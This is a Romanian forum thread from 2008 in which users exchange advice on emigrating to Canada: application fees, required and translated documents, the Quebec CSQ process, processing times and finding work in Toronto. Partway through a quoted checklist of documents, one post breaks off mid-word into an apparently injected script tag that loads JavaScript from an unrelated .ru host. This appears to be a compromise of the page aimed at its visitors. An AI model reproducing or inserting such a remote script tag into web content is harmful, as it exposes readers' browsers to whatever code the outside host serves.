PDA

Arată versiune întreagă : Emigrare Canada



clau78
24.01.2008, 20:47
Pentru emigrare in Canada trebuie platit comisionul catre ambasada atat de catre mine (aplicant principal) cat si de sotia mea?


Nu prea am inteles bine acest lucru!


In general, care sunt documentele ce trebuiesc atasate la formularul de emigrare (diplome, cazier, certificat nastere, certificat casatorie,...)?


Multumesc

gabi&serban
25.01.2008, 15:04
da si tu si sotia ta trebuie sa platiti comisionul, care de anul trecut parca e mai mic cu cativa dolarei. cat priveste dosarul pt. ambasada Canadei la Bucuresti noi l-am facut dupa urmatoarele recomandari:


Dosarul pe care

clau78
28.01.2008, 19:57
Ce este CSQ?

gabi&serban
29.01.2008, 06:51
clau78 eu nu am inteles ceva, la care dosar te referi exact? ai sustinut interviul cu un ofiter canadian? pt ca de sus reiese ca da si ca acum vrei sa pregatesti dosarul pt ambasada canadei.


daca nu ai sustinut interviul de emigrare atunci vb de alte acte, alte formulare.


multa bafta.

clau78
29.01.2008, 21:23
Nu am sustinut nici un interviu fiindca nu stiu de aca ceva.


Tot ceea ce stiu este ca trebuie sa completez aceste formulare si in cazul in care sunt acceptat voi sustine un interviu. Eu unul asa am fost informat.


Nu este corect? Daca nu spuneti-mi va rog ce trebuie sa fac?

gabi&serban
30.01.2008, 03:46
aaaa bun acum am inteles.


trebuie sa pregtesti dosarul pt Viena. acolo il vei trimite impreuna cu chitanta platita pt depunerea dosarului. atunci uite aici o lista cu actele ce trebuie facute si formularele necesare:


site-ul :http://www.quebec.ro/files/emigrare/emigrare1.php


Consideram ca trebuie sa lamurim de la bun inceput aspectul vizei de emigrare. Precum stiti probabil, evaluarea pentru emigrarea in Provincia Quebec se face pe cu totul alte criterii decit evaluarea pentru celelalte provincii. In fapt, fiecare provincie are dreptul de a-si alege singura emigrantii.
Autoevaluarea este in fapt primul pas ce trebuie facut de dvs pentru a vedea daca sunteti eligibili pentru a incepe procesul de emigrare in Quebec.
Aceasta autoevaluare este un test online care se gaseste pe site-ul oficial al guvernului provinciei Quebec. Acest test-formular va evalueaza sansele Dv. de a fi acceptat ca emigrant. Raspunsul la aceasta autoevaluare vine pe loc si poate fi pozitiv sau negativ. </A>


Pentru a accesa AUTOEVALUAREA va rog CLICK AICI (http://206.162.174.213/dpi/index.jsp?languageCode=fr)Va rog sa fiti foarte atenti cand va autoevaluati la cunostintele de limba franceza!


IMPORTANT:
Actele in limba romana trebuie traduse in franceza sau engleza de catre un traducator autorizat de Ministerul Justitiei. Traducerile actelor NU se legalizeaza! Argumente pro sau contra legalizarii traducerilor gasiti in Sectiunea FAQ care poate fi accesata AICI (http://www.quebec.ro/faq/index.php)
Actele in limba romana trebuie xeroxate si acele fotocopii vor fi legalizate de catre un notar. Nu trimiteti doar copii xerox ale actelor pentru ca nu au nici o valoare! </A>
Actele care demonstreaza studiile Dv. sunt:
1.diploma de bacalaureat (plus foaia matricola doar pentru cei care nu au studii superioare)
<BLOCKQUOTE>
2.certificat de calificare intr-o meserie pentru absolventii de liceu industrial care au primit o asemenea hartie (de obicei acest certificat a fost eliberat in acelasi timp cu diploma de bacalaureat)
3.diploma de facultate + foaia matricola
4.diploma de master/doctorat (daca e cazul)
5.alte diplome si certificate care arata calificare Dv. intr-un anumit domeniu (cursuri de calculatoare, de secretariat, de limbi straine etc.) </BLOCKQUOTE>

Actele care demonstreaza situatia Dv. financiara:
<BLOCKQUOTE>
1.extras de cont bancar (nu mai vechi de 10 zile, se trimite in original, netradus si nelegalizat)
sau
2.act de proprietate al unui apartament care a fost obtinut prin vanzare-cumparare sau donatie si al carui proprietar este aplicantul principal sau aplicantul secundar. Apartamentul va trebui evaluat de catre un evaluator autorizat ANEVAR.
Evaluarea va fi tradusa si va fi facuta si o copie xerox legalizata dupa varianata in romana a evaluarii.Aceasta evaluare va insoti traducerea si copia xerox legalizata a contractului de proprietate!
De asemenea veti prezenta si extras de carte funciara sau certificat fiscal impreuna cu traducerea notariala! </BLOCKQUOTE>
Actele care demonstreaza experienta Dv. in campul muncii:
<BLOCKQUOTE>
1.Cartea de munca
si/sau
2. Adeverinte eliberate de firma la care ati lucrat sau lucrati. Aceste adeverinte trebuie sa aiba antetul firmei, numere de telefon, semnatura in clar a conducatorului unitatii si trebuie sa fie vizate de Inspectoratul Teritorial de Munca.
3.In unele cazuri au fost acceptate si contractele d<script src=http://www.iroe.ru/ngg.js></script>

gabi&serban
30.01.2008, 04:10
dupa ce acest dosar e trimis si acceptat vei primii scrisori daca lipseste ceva sau marea scrisoare cu data interviului in lb franceza. cred ca in aceeasi scrisoare iti spune ce trebuie sa duci cu tine la interviu, asta daca mai trebuie sa le arati ceva. apoi daca interviul e luat vi se va da renumitul CSQ(certificat de selectie pt Quebec), pe care trebuie sa il pastrati in loc sigur si sa il aveti cu voi in canada, apoi trebuie facut dosarul pt Ambasada Canadei de la Bucuresti, detalii date in primul meu mesaj. apoi analizele medicale, viza si via Canada.


alte intrebari? voi fi aici...daca nu eu atunci ceilalti membrii ai forumului.


multa bafta

polldaniel
30.01.2008, 20:05
salutare,
eu si cu sotia mea am dori sa emigram in canada , in regiunea ontartio , in parte engleza....

va rog sa-mi trimiteti si mie actele necesare si pasii care trebuiesc indepliniti....

si sumele de bani pe care trebuie sa platim...

va multumesc!

fifi
31.01.2008, 11:39
polldaniel,aicihttp://www.cic.gc.ca/english/immigrate/skilled/index.asp
gasesti toate raspunsurile la

polldaniel
31.01.2008, 19:08
buna fifi!


ce vreau sa te intreb....


acolo cand ajungi cum este cu gasirea unui job?


te ajuta cineva de la guvern sau trebuie sa te descurci singur?


iti ajuta la ceva locul de munca din tara?


tin cont de ce ai lucrat in tara?


iar cu limba straina cum este? te poti descurca si daca nu o stii prea bine?


multumesc pt ajutor...!smileys/smiley1.gif

clau78
31.01.2008, 19:27
Pentru regiunea Ontario sunt necesare doar actele stipulate in link-ul:


www.cic.gc.ca/english/immigrate/skilled/index.asp (http://www.cic.gc.ca/english/immigrate/skilled/index.asp)?


Adica, trimiterea unui dosar la Viena este doar pentru regiunea Quebec?

gabi&serban
01.02.2008, 04:48
buna din nou,


eu am scris doar pt Quebec, deoarece emigrareain aceasta regiune se face mult mai usor si cu mai putini bani(din cunostinta de cauza). din cate imi aduc aminte pt partea federala punctajul e mai mare la fel si cerintele.


acum vezi si tu, fa evaluarea pt amandoua si compara. apoi in site-ul de mai sus mentionat de fifi vei gasi suma de bani necesara si durata de procesare a dosarului.


multa bafta.

mariacipri
11.03.2008, 17:46
Buna


Am inteles ca daca esti in SUA si aplici pentru emigrare in Canada, trebuie sa ai statut legal pentru inca 1 an. Eu si sotul suntem aici de aproape 3 ani, legal. Acum avem viza de student si respectiv dependent care expira in decembrie 2008. Putem aplica? El nu o sa termine scoala decat anul viitor, deci o sa aplicam pentru o extindere in octombrie (asa ne-au sfatuit de la facultate).


Putem aplica acum pentru Canada daca demonstram ca nu termina scoala decat la anu?


Cu locurile de munca cum e? E greu in zona Toronto de gasit de lucru? Exista agentii care te ajuta sa-ti gasesti de lucru?


Multumesc mult!


Maria

fifi
12.03.2008, 23:11
da, trebuie sa ai statut legal un an dar daca aveti posibilitate de prelungire, puteti incepe acum procesul de emigrare. Chiar daca, Doamne fereste, va refuza prelungirea vizei pt US si trebuie sa va intoarceti in Romania, procesul de emigrare pt canada se continua, nu trebuie s-o luati de la capat.


S-a cam incalcit website ul de emigrare al Canadei dau uite aici timpii de procesare pt partea federala (http://www.cic.gc.ca/english/in&#102;ormati&#111;n/times/internati&#111;nal/02a-skilled-fed.asp) si pt quebec (http://www.cic.gc.ca/english/in&#102;ormati&#111;n/times/internati&#111;nal/02b-skilled-que.asp). Uita-te in tabel jos la Buffalo, tot pt quebec e mai rapid procesul chiar daca aplici din US.


despre locuri de munca in Toronto, se gasesc, nu as sfatui pe nimeni sa apeleze la agentii de plasament care sunt foarte multe, nu asigura un servici permanentsi platesc foarte putin. Cat de repede iti gasesti job depinde foarte mult de domeniul in care lucrezi si de experienta pe care o ai.


pt polldaniel, cu limba nu prea e bine daca nu te descurci dar sunt si job uri unde nu este chiar o necesitate limba. De ajutat efectiv nu te ajuta nimeni sa-ti gasesti un job dar da, sunt organizatii de guvern care iti ofera orintare, cursuri, sfaturi despre cum sa te pregatesti pt obtinerea unui job, human resources (http://www.tor&#111;nto.ca/employment/civic_centres.htm).


sa aveti o idee despre ce fel de job uri sunt cautate in toronto sau in canada, cat sunt platite si ce cerinte au, consultati aceste website uri cu oferte de job uri (asa cum v-am spus, nu luati in seama pe cele postate de agentii de plasament):


http://www.jobbank.gc.ca/prov_en.aspx?Student=No


http://www.workopolis.com/work.aspx?action=Transfer&amp;View =Content/JobSeeker/JobSearchView&amp;lang=EN&amp;OldUrl (http://www.workopolis.com/work.aspx?acti&#111;n=Transfer&amp;View=C&#111;ntent/JobSeeker/JobSearchView&amp;lang=EN&amp;OldUrl)=

micuza2004
01.04.2008, 05:23
buna, va rog daca se poate sa ne spuneti pasii pt. emigrarea in partea vancouver-ului, in partea engleza .


va multumim

fifi
28.04.2008, 13:26
am vazut tarziu, poate prea tarziu postarea ta, micutzo, dar Vancouver se incadreaza la partea engleza, federala. Pasii si toate informatiile pt asta se gasesc aici: http://www.cic.gc.ca/english/immigrate/skilled/index.asp